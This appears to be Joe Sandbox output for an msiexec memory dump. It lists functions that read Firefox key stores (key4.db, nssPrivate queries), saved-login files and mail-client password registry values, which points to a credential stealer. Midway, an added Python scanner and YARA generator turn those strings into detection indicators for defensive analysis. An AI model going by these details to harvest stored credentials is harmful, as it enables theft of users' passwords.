                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                    • String ID: %s:$EDIT$STATIC
                                                                    • API String ID: 1703216249-3046471546
                                                                    • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                    • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                    • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                                                    • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004024F5
                                                                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                    • _mbscpy.MSVCRT(?,00000000,?,?,?,67CE7B60,?,00000000), ref: 00402533
                                                                    • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _mbscpy$QueryValuememset
                                                                    • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                    • API String ID: 168965057-606283353
                                                                    • Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                    • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                    • Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                                                    • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00402869
                                                                      • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                    • _mbscpy.MSVCRT(?,?,67CE7B60,?,00000000), ref: 004028A3
                                                                      • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                    • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,67CE7B60,?,00000000), ref: 0040297B
                                                                      • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                    • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                    • API String ID: 1497257669-167382505
                                                                    • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                    • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                                                    • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                    • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                                                    APIs
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                                                    • LoadCursorA.USER32(00000067), ref: 0040115F
                                                                    • SetCursor.USER32(00000000,?,?), ref: 00401166
                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                                                    • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                                                    • EndDialog.USER32(?,00000001), ref: 0040121A
                                                                    • DeleteObject.GDI32(?), ref: 00401226
                                                                    • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                                                    • ShowWindow.USER32(00000000), ref: 00401253
                                                                    • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                                                    • ShowWindow.USER32(00000000), ref: 00401262
                                                                    • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                                                    • memset.MSVCRT ref: 0040128E
                                                                    • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                                                    • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                                                    • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                                                    • String ID:
                                                                    • API String ID: 2998058495-0
                                                                    • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                    • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                                                    • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                                                    • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                                                    APIs
                                                                    • memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                    • memcmp.MSVCRT(localhost,?,00000009,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442656
                                                                    • memcmp.MSVCRT(vfs,00000001,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 00442800
                                                                    • memcmp.MSVCRT(cache,00000001,00000005,00000000,00000000,BINARY), ref: 0044282C
                                                                    • memcmp.MSVCRT(mode,00000001,00000004,00000000,00000000,BINARY), ref: 0044285E
                                                                    • memcmp.MSVCRT(?,?,G+D,00000000,00000000,BINARY), ref: 004428A9
                                                                    • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 0044293C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcmp$memcpy
                                                                    • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                                                    • API String ID: 231171946-2189169393
                                                                    • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                    • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                                                    • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                                                    • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _mbscat$memsetsprintf$_mbscpy
                                                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                    • API String ID: 633282248-1996832678
                                                                    • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                    • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                                                    • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                                                    • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00406782
                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040685E
                                                                    • memcmp.MSVCRT(00000000,00457934,00000006,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 0040686E
                                                                    • memcpy.MSVCRT(?,00000023,?,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068A1
                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 004068BA
                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 004068D3
                                                                    • memcmp.MSVCRT(00000000,0045793C,00000006,?,?,?,?,?,?,?,?,?,?,?,key4.db,00000143), ref: 004068EC
                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00406908
                                                                    • memcmp.MSVCRT(00000000,00456EA0,00000010,?,?,?,?,?,?,?,?,?,?,key4.db,00000143,00000000), ref: 004069B2
                                                                    • memcmp.MSVCRT(00000000,00457944,00000006), ref: 004069CA
                                                                    • memcpy.MSVCRT(?,00000023,?), ref: 00406A03
                                                                    • memcpy.MSVCRT(?,00000042,00000010), ref: 00406A1F
                                                                    • memcpy.MSVCRT(?,00000054,00000020), ref: 00406A3B
                                                                    • memcmp.MSVCRT(00000000,0045794C,00000006), ref: 00406A4A
                                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00406A6E
                                                                    • memcpy.MSVCRT(?,0000001A,00000020), ref: 00406A86
                                                                    Strings
                                                                    • key4.db, xrefs: 00406756
                                                                    • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                                                    • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                                                    • , xrefs: 00406834
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$memcmp$memsetstrlen
                                                                    • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                    • API String ID: 3614188050-3983245814
                                                                    • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                    • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                                                    • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                                                    • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
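The function listings above (the key4.db / nssPrivate SQL queries, the logins.json field names httpRealm, passwordField, usernameField, encryptedPassword, encryptedUsername, hostname, and the POP3 / SMTP / IMAP / HTTPMail registry value names read via RegQueryValueExA) are the strings an analyst would turn into a detection for the credential-harvesting code carried in this msiexec memory region. What follows is an added example, not part of the Joe Sandbox output and not the sample's own code: a Python scanner that checks a memory dump for those strings, grouped by the credential store each function appears to target, with a per-group threshold so that generic tokens such as hostname or logins do not fire on their own, plus a generator that emits the same indicators as a YARA rule. The category names, the rule name and the SAMPLE_DUMP bytes are constructed for the example; the grouping of strings into stores is an inference from the listings, not something the report states.

```python
from typing import Dict, List

# Indicator strings copied from the function listings in this report, grouped by
# the credential store the surrounding function appears to target (the grouping
# is the example author's inference, not a statement from the report).
INDICATORS: Dict[str, List[bytes]] = {
    "firefox_nss_keystore": [
        b"key4.db",
        b"SELECT a11,a102 FROM nssPrivate",
        b"SELECT item1,item2 FROM metadata WHERE id = 'password'",
    ],
    "firefox_logins_json": [
        b"encryptedPassword", b"encryptedUsername", b"httpRealm",
        b"passwordField", b"usernameField", b"hostname", b"logins",
    ],
    "windows_mail_registry": [
        b"POP3 Server", b"POP3 User Name", b"SMTP Server",
        b"SMTP Email Address", b"IMAP Server", b"HTTPMail Server", b"Password2",
    ],
    "outlook_account_registry": [
        b"POP3 Use SPA", b"IMAP Use SPA", b"SMTP Use SSL",
        b"HTTP Server URL", b"HTTPMail Use SSL",
    ],
    "mail_uri_formats": [b"imap://%s", b"mailbox://%s", b"smtp://%s"],
}

# A single generic token (e.g. "hostname") is not evidence; require several
# distinct strings from the same group before reporting that group.
MIN_HITS = 2


def scan_dump(data: bytes, min_hits: int = MIN_HITS) -> Dict[str, List[str]]:
    """Return {group: [matched strings]} for every group with >= min_hits distinct hits."""
    found: Dict[str, List[str]] = {}
    for group, needles in INDICATORS.items():
        hits = [n.decode() for n in needles if n in data]
        if len(hits) >= min_hits:
            found[group] = hits
    return found


def _yara_literal(needle: bytes) -> str:
    """Render a byte string as a double-quoted YARA text string."""
    text = needle.decode().replace("\\", "\\\\").replace('"', '\\"')
    return f'"{text}"'


def to_yara(rule_name: str = "credential_harvester_strings",
            min_hits: int = MIN_HITS) -> str:
    """Emit the indicators as a YARA rule: one string per indicator, one
    'N of (...)' clause per group, groups OR-ed together (hypothetical rule name)."""
    lines = [f"rule {rule_name}", "{", "    strings:"]
    clauses = []
    for gi, (group, needles) in enumerate(INDICATORS.items()):
        ids = []
        for ni, needle in enumerate(needles):
            sid = f"$s{gi}_{ni}"
            ids.append(sid)
            lines.append(f"        {sid} = {_yara_literal(needle)} ascii wide  // {group}")
        clauses.append(f"{min_hits} of ({', '.join(ids)})")
    lines.append("    condition:")
    lines.append("        " + " or ".join(clauses))
    lines.append("}")
    return "\n".join(lines)


# Constructed stand-in for a process memory dump: two NSS key-store strings
# plus a lone "hostname", which must stay below the logins.json threshold.
SAMPLE_DUMP = (
    b"\x00" * 32
    + b"key4.db\x00SELECT a11,a102 FROM nssPrivate\x00"
    + b"hostname\x00" + b"\xcc" * 32
)


if __name__ == "__main__":
    for group, hits in scan_dump(SAMPLE_DUMP).items():
        print(f"{group}: {hits}")
    print(to_yara())
```

Run it against a real dump with `scan_dump(open(path, "rb").read())`; the threshold is per group, so lowering it to 1 is only sensible for the NSS or mail-URI groups, whose strings are specific enough to stand alone. The YARA rule uses plain text strings with `ascii wide`, which also catches the UTF-16 copies these functions produce through MultiByteToWideChar.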
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040A973
                                                                    • memset.MSVCRT ref: 0040A996
                                                                    • memset.MSVCRT ref: 0040A9AC
                                                                    • memset.MSVCRT ref: 0040A9BC
                                                                    • sprintf.MSVCRT ref: 0040A9F0
                                                                    • _mbscpy.MSVCRT(00000000, nowrap), ref: 0040AA37
                                                                    • sprintf.MSVCRT ref: 0040AABE
                                                                    • _mbscat.MSVCRT ref: 0040AAED
                                                                      • Part of subcall function 00410FD3: sprintf.MSVCRT ref: 00410FF7
                                                                    • _mbscpy.MSVCRT(?,?), ref: 0040AAD2
                                                                    • sprintf.MSVCRT ref: 0040AB21
                                                                      • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                      • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                                                    • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                    • API String ID: 710961058-601624466
                                                                    • Opcode ID: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                                    • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                                                    • Opcode Fuzzy Hash: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                                                    • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: sprintf$memset$_mbscpy
                                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                    • API String ID: 3402215030-3842416460
                                                                    • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                    • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                                                    • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                                                    • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                                                    APIs
                                                                      • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                                                      • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                                                      • Part of subcall function 004080D4: free.MSVCRT ref: 004080DB
                                                                      • Part of subcall function 00407035: _mbscpy.MSVCRT(?,?,0040F113,?,?,?,?,?), ref: 0040703A
                                                                      • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                                                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                                                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                                                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                                                      • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                      • Part of subcall function 0040DAC2: memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                      • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                                                    • strlen.MSVCRT ref: 0040F139
                                                                    • strlen.MSVCRT ref: 0040F147
                                                                    • memset.MSVCRT ref: 0040F187
                                                                    • strlen.MSVCRT ref: 0040F196
                                                                    • strlen.MSVCRT ref: 0040F1A4
                                                                    • memset.MSVCRT ref: 0040F1EA
                                                                    • strlen.MSVCRT ref: 0040F1F9
                                                                    • strlen.MSVCRT ref: 0040F207
                                                                    • _strcmpi.MSVCRT ref: 0040F2B2
                                                                    • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F2CD
                                                                    • _mbscpy.MSVCRT(00000004,00000204,?,?,?,?,?,?), ref: 0040F30E
                                                                      • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                      • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: strlen$memset$_mbscpy$memcpy$CloseFileHandleSize_mbscat_mbsicmp_strcmpifreestrrchr
                                                                    • String ID: logins.json$none$signons.sqlite$signons.txt
                                                                    • API String ID: 2003275452-3138536805
                                                                    • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                    • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                                                    • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                                                    • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040C3F7
                                                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040C408
                                                                    • strrchr.MSVCRT ref: 0040C417
                                                                    • _mbscat.MSVCRT ref: 0040C431
                                                                    • _mbscpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040C465
                                                                    • _mbscpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040C476
                                                                    • GetWindowPlacement.USER32(?,?), ref: 0040C50C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                                                    • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                                    • API String ID: 1012775001-1343505058
                                                                    • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                    • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                                                    • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                                                    • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00444612
                                                                      • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                                                    • strlen.MSVCRT ref: 0044462E
                                                                    • memset.MSVCRT ref: 00444668
                                                                    • memset.MSVCRT ref: 0044467C
                                                                    • memset.MSVCRT ref: 00444690
                                                                    • memset.MSVCRT ref: 004446B6
                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                                                      • Part of subcall function 0040D2A3: memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                                                    • memcpy.MSVCRT(?,00000000,00000008,?,?,?,00000000,000003FF,?,00000000,0000041E,?,00000000,0000041E,?,00000000), ref: 004446ED
                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                      • Part of subcall function 0040D205: memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                      • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                                                    • memcpy.MSVCRT(?,?,00000010,?,?), ref: 00444729
                                                                    • memcpy.MSVCRT(?,?,00000008,?,?,00000010,?,?), ref: 0044473B
                                                                    • _mbscpy.MSVCRT(?,?), ref: 00444812
                                                                    • memcpy.MSVCRT(?,?,00000004,?,?,?,?), ref: 00444843
                                                                    • memcpy.MSVCRT(?,?,00000004,?,?,00000004,?,?,?,?), ref: 00444855
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: memcpymemset$strlen$_mbscpy
                                                                    • String ID: salu
                                                                    • API String ID: 3691931180-4177317985
                                                                    • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                    • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                                                    • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                                                    • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                                                    • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2615568136.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                    • API String ID: 2449869053-232097475
                                                                    • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                    • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                                                    • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                                                    • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                                                    APIs
                                                                    • sprintf.MSVCRT ref: 0040957B
                                                                    • LoadMenuA.USER32(?,?), ref: 00409589
                                                                      • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                                                      • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                                                      • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                                                      • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                                                    • DestroyMenu.USER32(00000000), ref: 004095A7
                                                                    • sprintf.MSVCRT ref: 004095EB
                                                                    • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                                                    • memset.MSVCRT ref: 0040961C
                                                                    • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                                                    • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
